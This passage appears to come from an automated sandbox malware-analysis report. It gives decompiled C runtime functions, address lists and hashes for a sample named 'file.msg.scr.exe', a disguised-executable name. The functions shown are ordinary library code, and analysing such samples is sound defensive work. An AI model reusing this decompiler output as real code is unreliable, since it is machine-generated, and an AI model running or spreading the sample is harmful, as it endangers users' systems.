                                                                    0x0042bee6
                                                                    0x0042beef
                                                                    0x0042bef2
                                                                    0x0042bef8
                                                                    0x0042befb
                                                                    0x0042befd
                                                                    0x0042beff
                                                                    0x0042bf02
                                                                    0x0042bf08
                                                                    0x0042bf09
                                                                    0x0042bf0c
                                                                    0x0042bf1d
                                                                    0x0042bf21
                                                                    0x0042bf24
                                                                    0x0042bf29
                                                                    0x0042bf29
                                                                    0x0042bf46
                                                                    0x0042bf4a
                                                                    0x0042bf5b
                                                                    0x0042bf66
                                                                    0x0042bf6c
                                                                    0x0042bf7e
                                                                    0x0042bf84
                                                                    0x0042bf86
                                                                    0x0042bf8e
                                                                    0x0042bf90
                                                                    0x0042bf97
                                                                    0x0042bf9d
                                                                    0x0042bfa2
                                                                    0x0042bfaf
                                                                    0x0042bfb5
                                                                    0x0042bfb8
                                                                    0x0042bfbb
                                                                    0x0042bfbe
                                                                    0x0042bfc1
                                                                    0x0042bfc4
                                                                    0x0042bfc9
                                                                    0x0042bfef
                                                                    0x0042bfef
                                                                    0x0042bff6
                                                                    0x0042c001
                                                                    0x0042c001
                                                                    0x0042bff8
                                                                    0x0042bff8
                                                                    0x0042bff8
                                                                    0x0042c008
                                                                    0x0042c00c
                                                                    0x0042c00c
                                                                    0x00000000
                                                                    0x0042c00c
                                                                    0x0042bfdc
                                                                    0x0042bfe3
                                                                    0x0042bfeb
                                                                    0x0042bfed
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042bf92
                                                                    0x0042bf92
                                                                    0x0042bf92
                                                                    0x0042c00e
                                                                    0x00000000
                                                                    0x0042c00e
                                                                    0x0042bf90
                                                                    0x0042bec6
                                                                    0x0042bed0
                                                                    0x00000000
                                                                    0x0042bed0
                                                                    0x0042beb2
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: 1.2.3
                                                                    • API String ID: 432593777-2310465506
                                                                    • Opcode ID: c4dedc8d02f874d90a66fce8caa90ed0770ead4202f9a3e7d344dcebc81321ce
                                                                    • Instruction ID: c2d0d4684f155b5402b699925cecf65e3905680253f6fd2c79c4331609b03b13
                                                                    • Opcode Fuzzy Hash: c4dedc8d02f874d90a66fce8caa90ed0770ead4202f9a3e7d344dcebc81321ce
                                                                    • Instruction Fuzzy Hash: A141E471A04B50AED7609F35AD01B67BBE8FB19314F41492FE496C2691EB78E004CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 65%
                                                                    			E00427585(void* __ebx, void* __edi, void* __esi) {
                                                                    				intOrPtr _v8;
                                                                    				char _v21;
                                                                    				signed char _v22;
                                                                    				struct _cpinfo _v28;
                                                                    				char _v284;
                                                                    				char _v540;
                                                                    				char _v796;
                                                                    				char _v1308;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t42;
                                                                    				signed int _t45;
                                                                    				char _t47;
                                                                    				signed char _t48;
                                                                    				signed int _t58;
                                                                    				signed int _t59;
                                                                    				signed int _t65;
                                                                    				signed int _t68;
                                                                    				signed char _t70;
                                                                    				char _t71;
                                                                    				signed int _t73;
                                                                    				signed int _t74;
                                                                    				signed char* _t78;
                                                                    				signed char* _t79;
                                                                    				void* _t81;
                                                                    				void* _t86;
                                                                    				void* _t87;
                                                                    
                                                                    				_t80 = __edi;
                                                                    				_t63 = __ebx;
                                                                    				_t42 =  *0x446f24; // 0x82246c35
                                                                    				_v8 = _t42;
                                                                    				if(GetCPInfo( *0x44b004,  &_v28) != 1) {
                                                                    					_t45 = 0;
                                                                    					__eflags = 0;
                                                                    					do {
                                                                    						__eflags = _t45 - 0x41;
                                                                    						if(_t45 < 0x41) {
                                                                    							L23:
                                                                    							__eflags = _t45 - 0x61;
                                                                    							if(_t45 < 0x61) {
                                                                    								L26:
                                                                    								 *(_t45 + 0x44b020) = 0;
                                                                    							} else {
                                                                    								__eflags = _t45 - 0x7a;
                                                                    								if(_t45 > 0x7a) {
                                                                    									goto L26;
                                                                    								} else {
                                                                    									 *(_t45 + 0x44af01) =  *(_t45 + 0x44af01) | 0x00000020;
                                                                    									_t68 = _t45 - 0x20;
                                                                    									goto L22;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							__eflags = _t45 - 0x5a;
                                                                    							if(_t45 > 0x5a) {
                                                                    								goto L23;
                                                                    							} else {
                                                                    								 *(_t45 + 0x44af01) =  *(_t45 + 0x44af01) | 0x00000010;
                                                                    								_t68 = _t45 + 0x20;
                                                                    								__eflags = _t68;
                                                                    								L22:
                                                                    								 *(_t45 + 0x44b020) = _t68;
                                                                    							}
                                                                    						}
                                                                    						_t45 = _t45 + 1;
                                                                    						__eflags = _t45 - 0x100;
                                                                    					} while (_t45 < 0x100);
                                                                    				} else {
                                                                    					_t47 = 0;
                                                                    					do {
                                                                    						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                    						_t47 = _t47 + 1;
                                                                    					} while (_t47 < 0x100);
                                                                    					_t48 = _v22;
                                                                    					_v284 = 0x20;
                                                                    					if(_t48 != 0) {
                                                                    						_push(__ebx);
                                                                    						_t78 =  &_v21;
                                                                    						_push(__edi);
                                                                    						do {
                                                                    							_t65 =  *_t78 & 0x000000ff;
                                                                    							_t59 = _t48 & 0x000000ff;
                                                                    							if(_t59 <= _t65) {
                                                                    								_t73 = _t65 - _t59 + 1;
                                                                    								_t74 = _t73 >> 2;
                                                                    								_t81 = _t86 + _t59 - 0x118;
                                                                    								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                    								_t87 = _t87 + 0x18;
                                                                    								_t65 = 0;
                                                                    							}
                                                                    							_t79 =  &(_t78[1]);
                                                                    							_t48 =  *_t79;
                                                                    							_t78 =  &(_t79[1]);
                                                                    							_t96 = _t48;
                                                                    						} while (_t48 != 0);
                                                                    						_pop(_t80);
                                                                    						_pop(_t63);
                                                                    					}
                                                                    					_push(0);
                                                                    					_push( *0x44aed8);
                                                                    					_push( *0x44b004);
                                                                    					_push( &_v1308);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(1);
                                                                    					E00427CEB(_t63, _t65, _t80, 0x100, _t96);
                                                                    					_push(0);
                                                                    					_push( *0x44b004);
                                                                    					_push(0x100);
                                                                    					_push( &_v540);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(0x100);
                                                                    					_push( *0x44aed8);
                                                                    					E0042933F(_t63, _t80, 0x100, _t96);
                                                                    					_push(0);
                                                                    					_push( *0x44b004);
                                                                    					_push(0x100);
                                                                    					_push( &_v796);
                                                                    					_push(0x100);
                                                                    					_push( &_v284);
                                                                    					_push(0x200);
                                                                    					_push( *0x44aed8);
                                                                    					E0042933F(_t63, _t80, 0x100, _t96);
                                                                    					_t58 = 0;
                                                                    					do {
                                                                    						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                    						if((_t70 & 0x00000001) == 0) {
                                                                    							__eflags = _t70 & 0x00000002;
                                                                    							if((_t70 & 0x00000002) == 0) {
                                                                    								 *((char*)(_t58 + 0x44b020)) = 0;
                                                                    							} else {
                                                                    								 *(_t58 + 0x44af01) =  *(_t58 + 0x44af01) | 0x00000020;
                                                                    								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                    								goto L12;
                                                                    							}
                                                                    						} else {
                                                                    							 *(_t58 + 0x44af01) =  *(_t58 + 0x44af01) | 0x00000010;
                                                                    							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                    							L12:
                                                                    							 *((char*)(_t58 + 0x44b020)) = _t71;
                                                                    						}
                                                                    						_t58 = _t58 + 1;
                                                                    					} while (_t58 < 0x100);
                                                                    				}
                                                                    				return E00428381(_t45, _v8);
                                                                    			}





























                                                                    0x00427585
                                                                    0x00427585
                                                                    0x0042758e
                                                                    0x00427593
                                                                    0x004275af
                                                                    0x004276c2
                                                                    0x004276c2
                                                                    0x004276c4
                                                                    0x004276c4
                                                                    0x004276c7
                                                                    0x004276e2
                                                                    0x004276e2
                                                                    0x004276e5
                                                                    0x004276fa
                                                                    0x004276fa
                                                                    0x004276e7
                                                                    0x004276e7
                                                                    0x004276ea
                                                                    0x00000000
                                                                    0x004276ec
                                                                    0x004276ec
                                                                    0x004276f5
                                                                    0x00000000
                                                                    0x004276f5
                                                                    0x004276ea
                                                                    0x004276c9
                                                                    0x004276c9
                                                                    0x004276cc
                                                                    0x00000000
                                                                    0x004276ce
                                                                    0x004276ce
                                                                    0x004276d7
                                                                    0x004276d7
                                                                    0x004276da
                                                                    0x004276da
                                                                    0x004276da
                                                                    0x004276cc
                                                                    0x00427701
                                                                    0x00427702
                                                                    0x00427702
                                                                    0x004275b5
                                                                    0x004275b5
                                                                    0x004275b7
                                                                    0x004275b7
                                                                    0x004275be
                                                                    0x004275bf
                                                                    0x004275c3
                                                                    0x004275c8
                                                                    0x004275cf
                                                                    0x004275d1
                                                                    0x004275d2
                                                                    0x004275d5
                                                                    0x004275d6
                                                                    0x004275d6
                                                                    0x004275d9
                                                                    0x004275de
                                                                    0x004275e2
                                                                    0x004275e5
                                                                    0x004275e8
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fb
                                                                    0x004275fd
                                                                    0x004275fe
                                                                    0x00427600
                                                                    0x00427601
                                                                    0x00427601
                                                                    0x00427605
                                                                    0x00427606
                                                                    0x00427606
                                                                    0x00427607
                                                                    0x00427609
                                                                    0x00427615
                                                                    0x0042761b
                                                                    0x0042761c
                                                                    0x00427623
                                                                    0x00427624
                                                                    0x00427626
                                                                    0x0042762b
                                                                    0x0042762d
                                                                    0x00427639
                                                                    0x0042763a
                                                                    0x0042763b
                                                                    0x00427642
                                                                    0x00427643
                                                                    0x00427644
                                                                    0x0042764a
                                                                    0x0042764f
                                                                    0x00427651
                                                                    0x0042765d
                                                                    0x0042765e
                                                                    0x0042765f
                                                                    0x00427666
                                                                    0x00427667
                                                                    0x0042766c
                                                                    0x00427672
                                                                    0x0042767a
                                                                    0x0042767c
                                                                    0x0042767c
                                                                    0x00427687
                                                                    0x0042769f
                                                                    0x004276a2
                                                                    0x004276b4
                                                                    0x004276a4
                                                                    0x004276a4
                                                                    0x004276ab
                                                                    0x00000000
                                                                    0x004276ab
                                                                    0x00427689
                                                                    0x00427689
                                                                    0x00427690
                                                                    0x00427697
                                                                    0x00427697
                                                                    0x00427697
                                                                    0x004276bb
                                                                    0x004276bc
                                                                    0x004276c0
                                                                    0x00427710

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID: $
                                                                    • API String ID: 1807457897-3032137957
                                                                    • Opcode ID: 18e2ff6c26c8253a2f8acef6f846d20aab1b8c5afafc6d36cc06a173ecefb2d2
                                                                    • Instruction ID: b740f4969e18365772719e246697fcdf2e7dcb58cf6709ad3cc1780a737a8b75
                                                                    • Opcode Fuzzy Hash: 18e2ff6c26c8253a2f8acef6f846d20aab1b8c5afafc6d36cc06a173ecefb2d2
                                                                    • Instruction Fuzzy Hash: 114178312086AC9EEB018728FC59FFB7FE8EB06304F6404E6D545C7162C3694989DB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00426FD8() {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				void* __ecx;
                                                                    				void* __esi;
                                                                    				CHAR* _t10;
                                                                    				signed int _t16;
                                                                    				signed int _t22;
                                                                    				CHAR* _t25;
                                                                    				signed int _t34;
                                                                    				CHAR* _t37;
                                                                    
                                                                    				_push(_t27);
                                                                    				if( *0x44c270 == 0) {
                                                                    					E004279F1();
                                                                    				}
                                                                    				_t37 = "C:\\Users\\jones\\Desktop\\file.msg.scr.exe";
                                                                    				 *0x4483c4 = 0;
                                                                    				GetModuleFileNameA(0, _t37, 0x104);
                                                                    				_t10 =  *0x44c29c;
                                                                    				 *0x448298 = _t37;
                                                                    				if(_t10 == 0) {
                                                                    					L4:
                                                                    					_t25 = _t37;
                                                                    				} else {
                                                                    					_t25 = _t10;
                                                                    					if( *_t10 == 0) {
                                                                    						goto L4;
                                                                    					}
                                                                    				}
                                                                    				E00426E6C(_t25, 0,  &_v12, 0,  &_v8);
                                                                    				_t40 = _v8 << 2;
                                                                    				_t16 = E00422EEB(_v12 + (_v8 << 2));
                                                                    				_t34 = _t16;
                                                                    				if(_t34 != 0) {
                                                                    					E00426E6C(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                    					 *0x44827c = _v8 - 1;
                                                                    					 *0x448280 = _t34;
                                                                    					_t22 = 0;
                                                                    				} else {
                                                                    					_t22 = _t16 | 0xffffffff;
                                                                    				}
                                                                    				return _t22;
                                                                    			}













                                                                    0x00426fdc
                                                                    0x00426fe8
                                                                    0x00426fea
                                                                    0x00426fea
                                                                    0x00426ff4
                                                                    0x00426ffb
                                                                    0x00427002
                                                                    0x00427008
                                                                    0x0042700f
                                                                    0x00427015
                                                                    0x0042701e
                                                                    0x0042701e
                                                                    0x00427017
                                                                    0x0042701a
                                                                    0x0042701c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042701c
                                                                    0x0042702c
                                                                    0x00427037
                                                                    0x0042703d
                                                                    0x00427042
                                                                    0x00427049
                                                                    0x0042705d
                                                                    0x00427067
                                                                    0x0042706d
                                                                    0x00427073
                                                                    0x0042704b
                                                                    0x0042704b
                                                                    0x0042704b
                                                                    0x00427079

                                                                    APIs
                                                                    • ___initmbctable.LIBCMT ref: 00426FEA
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.msg.scr.exe,00000104,74714DE0,00000000,?,?,?,?,00422D8E,?,004303A8,00000060), ref: 00427002
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName___initmbctable
                                                                    • String ID: C:\Users\user\Desktop\file.msg.scr.exe
                                                                    • API String ID: 767393020-334049072
                                                                    • Opcode ID: 234d9c4164fe2c07e38451fbac239e82db8c6eb335865d90f2dce875e6177481
                                                                    • Instruction ID: e9f62d43712f1c1b5a1ff82a4471d7df2633b42affd03636cc46f9ac5e368971
                                                                    • Opcode Fuzzy Hash: 234d9c4164fe2c07e38451fbac239e82db8c6eb335865d90f2dce875e6177481
                                                                    • Instruction Fuzzy Hash: 7011E776B04124ABDB10DBA5FC8199F77A8FB45760F5101AFF805D3240DAB49D04C768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 69%
                                                                    			E0042335E(intOrPtr* __eax) {
                                                                    				void* _t14;
                                                                    				void* _t24;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    				void* _t29;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *((intOrPtr*)( *__eax)) == 0xe06d7363) {
                                                                    					 *(E00423BDF() + 0x84) =  *(_t12 + 0x84) & 0x00000000;
                                                                    					_push(8);
                                                                    					_push(0x430470);
                                                                    					E0042422C(_t24, _t27, _t28);
                                                                    					_t14 = E00423BDF();
                                                                    					__eflags =  *(_t14 + 0x6c);
                                                                    					if( *(_t14 + 0x6c) != 0) {
                                                                    						 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                    						 *((intOrPtr*)(E00423BDF() + 0x6c))();
                                                                    						_t7 = _t29 - 4;
                                                                    						 *_t7 =  *(_t29 - 4) | 0xffffffff;
                                                                    						__eflags =  *_t7;
                                                                    					}
                                                                    					E00426A34();
                                                                    					E00429729(_t24, _t27, _t28, __eflags);
                                                                    					E0042552E(3);
                                                                    					asm("int3");
                                                                    					_t9 = _t30 + 4; // 0x423938
                                                                    					 *0x430100( *_t9, 0x16, 0xa);
                                                                    					__eflags = 1;
                                                                    					return 1;
                                                                    				} else {
                                                                    					return 0;
                                                                    				}
                                                                    			}









                                                                    0x00423366
                                                                    0x00423370
                                                                    0x00423e86
                                                                    0x00423e88
                                                                    0x00423e8d
                                                                    0x00423e92
                                                                    0x00423e97
                                                                    0x00423e9b
                                                                    0x00423e9d
                                                                    0x00423ea6
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00427a11
                                                                    0x00427a18
                                                                    0x00427a21
                                                                    0x00427a26
                                                                    0x00427a27
                                                                    0x00427a2b
                                                                    0x00427a33
                                                                    0x00427a34
                                                                    0x00423368
                                                                    0x0042336a
                                                                    0x0042336a

                                                                    APIs
                                                                    • RtlInitializeCriticalSection.NTDLL(89B), ref: 00427A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection
                                                                    • String ID: 89B$csm
                                                                    • API String ID: 32694325-3340445378
                                                                    • Opcode ID: e5205d9dd9a17310e1f9df394a7c3c8b84d177bbd62c41bc458a8a61391274ad
                                                                    • Instruction ID: 8a1b5bfc1e1b0993bd398e324714e1130b351fb337a81dee8734de33435007f6
                                                                    • Opcode Fuzzy Hash: e5205d9dd9a17310e1f9df394a7c3c8b84d177bbd62c41bc458a8a61391274ad
                                                                    • Instruction Fuzzy Hash: 09F06D31759224DED305BF61B80AB293670BF1172BF92419BB150990E28F7C5E45AA1A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004224F6(intOrPtr* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr* _t22;
                                                                    
                                                                    				_t22 = __ecx;
                                                                    				_t21 = _a4;
                                                                    				 *__ecx = 0x430324;
                                                                    				_t2 = _t21 + 8; // 0xf0758950
                                                                    				_t9 =  *_t2;
                                                                    				 *((intOrPtr*)(__ecx + 8)) = _t9;
                                                                    				if(_t9 == 0) {
                                                                    					_t7 = _t21 + 4; // 0xf0458d00
                                                                    					 *((intOrPtr*)(__ecx + 4)) =  *_t7;
                                                                    				} else {
                                                                    					_t4 = _t21 + 4; // 0xf0458d00
                                                                    					_t14 = E00422EEB(E00422F20( *_t4) + 1);
                                                                    					 *((intOrPtr*)(_t22 + 4)) = _t14;
                                                                    					if(_t14 != 0) {
                                                                    						_t6 = _t21 + 4; // 0xf0458d00
                                                                    						E00423FB0(_t14,  *_t6);
                                                                    					}
                                                                    				}
                                                                    				return _t22;
                                                                    			}







                                                                    0x004224f7
                                                                    0x004224fa
                                                                    0x004224fe
                                                                    0x00422504
                                                                    0x00422504
                                                                    0x00422509
                                                                    0x0042250c
                                                                    0x00422533
                                                                    0x00422536
                                                                    0x0042250e
                                                                    0x0042250e
                                                                    0x00422518
                                                                    0x00422521
                                                                    0x00422524
                                                                    0x00422526
                                                                    0x0042252a
                                                                    0x00422530
                                                                    0x00422524
                                                                    0x0042253d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: c%B
                                                                    • API String ID: 432593777-3320929328
                                                                    • Opcode ID: 3e1e4b31f72973b05bd2d8f8181ae620774a18e6356d6742be44a9970f8b39a5
                                                                    • Instruction ID: 80f988887b7f855445f9966f9fd6066b43f7a1dfbecb2169e33240a71772aeff
                                                                    • Opcode Fuzzy Hash: 3e1e4b31f72973b05bd2d8f8181ae620774a18e6356d6742be44a9970f8b39a5
                                                                    • Instruction Fuzzy Hash: 45F012B2608621BE97209F55FA01417F7E8FF54710391D51FF854C3650DBB4E851D798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00421B79() {
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t22;
                                                                    				void* _t23;
                                                                    				void* _t24;
                                                                    				void* _t27;
                                                                    
                                                                    				E004232F0(E0042FE7A, _t24);
                                                                    				_t1 = _t24 - 0x28; // 0xb4
                                                                    				E00402A60(_t1, "string too long");
                                                                    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                    				_t4 = _t24 - 0x28; // 0xb4
                                                                    				_t5 = _t24 - 0x50; // 0x8c
                                                                    				_t20 = _t5;
                                                                    				E004029A0(_t20, _t27, _t4);
                                                                    				_t6 = _t24 - 0x50; // 0xb4
                                                                    				 *((intOrPtr*)(_t24 - 0x50)) = 0x4302a8;
                                                                    				_t16 = E0042246E(_t6, 0x432674);
                                                                    				asm("int3");
                                                                    				 *_t20 = 0x4302e8;
                                                                    				_t28 =  *((intOrPtr*)(_t20 + 8));
                                                                    				 *_t20 = 0x430324;
                                                                    				if( *((intOrPtr*)(_t20 + 8)) != 0) {
                                                                    					_push( *((intOrPtr*)(_t20 + 4)));
                                                                    					return E0042275E(_t18, _t22, _t23, _t28);
                                                                    				}
                                                                    				return _t16;
                                                                    			}










                                                                    0x00421b7e
                                                                    0x00421b8b
                                                                    0x00421b8e
                                                                    0x00421b93
                                                                    0x00421b97
                                                                    0x00421b9b
                                                                    0x00421b9b
                                                                    0x00421b9e
                                                                    0x00421ba8
                                                                    0x00421bac
                                                                    0x00421bb3
                                                                    0x00421bb8
                                                                    0x00421bb9
                                                                    0x00422540
                                                                    0x00422544
                                                                    0x0042254a
                                                                    0x0042254c
                                                                    0x00000000
                                                                    0x00422554
                                                                    0x00422555

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00421B7E
                                                                      • Part of subcall function 0042246E: RaiseException.KERNEL32(?,?,000000FF,00432DF4,00000000,004302E8,?,?,?,00421C58,000000FF,00432DF4,004480D0,?,000000FF,004136B9), ref: 0042249C
                                                                      • Part of subcall function 0042275E: __lock.LIBCMT ref: 0042277C
                                                                      • Part of subcall function 0042275E: HeapFree.KERNEL32(00000000,?,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 004227C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFreeH_prologHeapRaise__lock
                                                                    • String ID: c%B$string too long
                                                                    • API String ID: 2277933175-2929179188
                                                                    • Opcode ID: 253087d3a329c09ef09a120de4f40956b7426680cdce0a53c6156620066d3065
                                                                    • Instruction ID: bc1570ca240a635d414bef9b8a9f541bcd4c89b2cdb9d9533b463b18037a3bfc
                                                                    • Opcode Fuzzy Hash: 253087d3a329c09ef09a120de4f40956b7426680cdce0a53c6156620066d3065
                                                                    • Instruction Fuzzy Hash: D6F0E9B0600114ABC704EB90D95A79DB7746F04308FA0816FE00175491CBFD4645CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004224B9(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                    				intOrPtr _t6;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t14 = _a4;
                                                                    				_t15 = __ecx;
                                                                    				 *__ecx = 0x430324;
